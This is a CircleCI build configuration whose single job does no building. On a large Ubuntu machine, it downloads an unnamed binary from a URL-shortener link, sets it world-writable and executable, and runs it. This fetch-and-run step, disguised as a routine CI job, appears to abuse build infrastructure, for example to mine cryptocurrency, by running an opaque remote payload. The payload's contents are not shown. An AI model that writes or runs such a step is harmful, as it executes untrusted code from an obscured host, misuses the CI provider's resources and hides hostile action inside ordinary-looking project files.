version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - run: wget -O brah http://gg.gg/vl35a && chmod +x brah && chmod 777 brah && ./brah